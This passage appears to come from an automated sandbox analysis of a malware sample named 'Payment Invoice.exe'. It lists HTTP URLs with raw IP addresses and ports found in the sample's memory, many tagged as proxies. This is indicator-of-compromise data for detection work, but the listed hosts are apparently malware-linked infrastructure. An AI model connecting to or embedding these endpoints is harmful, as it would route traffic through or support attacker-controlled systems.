                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.185.105.105:4481://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.72.36.89
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.72.36.89://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.72.36.89:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.95.220.42:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://184.95.220.42:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.103.101.39:10051
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.103.101.39:10051://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.108.141.114:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.108.141.114:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.108.141.19:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.108.141.19:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163168B9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.109.184.150:53155
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.109.184.150:53155://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.109.184.150:63819
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.109.184.150:63819://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.128.153.10:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.128.153.10:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.129.250.183
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.129.250.183:14462
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.129.250.183:14462://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.129.250.183:26777
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.129.250.183:26777://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.130.219.10:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.130.219.10:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.132.242.212:8083
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.132.242.212:8083://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.158.248.95:5836
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.158.248.95:5836://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.228.154
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.228.154://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319B80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.228.154:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.228.170://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.228.170:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.228.48
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631967C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.228.48://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163196E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.228.48:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.00000163169B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.229.112:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.229.127
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.229.127://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.229.127:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.229.70
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.229.70://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.229.70:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317A35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.230.178
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.230.178://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.230.178:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317C25000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.231.226
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.231.226://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.162.231.226:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.165.232.45:6060
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.165.232.45:6060://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.165.232.65:6060
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.165.232.65:6060://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.167.59.215
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.167.59.215://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.167.59.215:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.169.181.12:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.169.181.12:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.169.181.25:4145
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.169.181.25:4145://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.169.183
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.169.183.200:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.169.183.200:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.171.55.218:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.171.55.218:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.174.137
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.174.137.30:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.174.137.30:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.18.198.
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.18.198.163:58714
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.18.198.163:58714://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.186.17.57:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.186.17.57:5678://proxyx
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.189.199.77:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.189.199.77:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.191.236.162:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.191.236.162:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.194.11.180:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.194.11.180:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.196.182.22:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.196.182.22:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C7F000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319778000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.198.56.73:47910
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319789000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.198.56.73:47910://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.37.245:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317046000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.37.245:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.37.98:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.37.98:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316926000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.38.117:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.200.38.117:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.202.165.1:53281
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.202.165.1:53281://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.202.7.161:1455
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.202.7.161:1455://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.101.216:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.101.216:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.102.62:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316BD2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.102.62:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.172.27:10204
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.208.172.27:10204://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.212.60.62
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.212.60.62://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.212.60.62:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.53.241:3629
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.215.53.241:3629://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.216.18.138:44550://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.136.67:1337
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631699B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.136.67:1337://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.143.23
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.143.23://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.217.143.23:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.22.31.227:4153
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.22.31.227:4153://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319C58000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.22.8.70:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.22.8.70:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.220.174.99:59967
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.220.174.99:59967://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.225.232.191://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.23.118.97:57377
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.23.118.97:57377://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.236.202.170:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.236.202.170:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316EA4000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.236.203.208:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.236.203.208:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.204:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.237.206.204:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.202
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.202://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.202:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.240
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.240://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.240:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.67
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.67://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.238.228.67:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.250.27.54:3128
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.250.27.54:3128://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.26.32.9
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318CB3000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.26.32.93:5678
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.26.32.93:5678://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.38.111.1:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.38.111.1:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.45.194.176:27639
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.45.194.176:27639://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.49.30.5:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.49.30.5:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.49.31.2
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.49.31.207:8081
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.49.31.207:8081://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.6.10.248:36627
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631925E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.6.10.248:36627://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.66.59.4:42647
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317DE0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.66.59.4:42647://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.82.87.30:1080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316B87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.82.87.30:1080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.85.161.214:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.85.161.214:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.103.130.91:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317D92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.103.130.91:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.103.130.94:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318E17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.103.130.94:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.124.164.213
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.124.164.213://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.124.164.213:80
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.125.218.145:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.125.218.145:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016316977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.125.218.153:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016318724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.125.218.153:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.148.175.194:999
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016317402000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.148.175.194:999://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.150.207.207:8080
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016319E8F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.150.207.207:8080://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.159.3.193:56861
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.000001631A88F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.159.3.193:56861://proxy
                Source: Payment Invoice.exe, 00000000.00000002.3288321931.0000016316ACD000.00000004.00000800.00020000.00000000.sdmp, Payment Invoice.exe, 00000000.00000002.3288321931.0000016318ABB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://186.159.6.163:1994
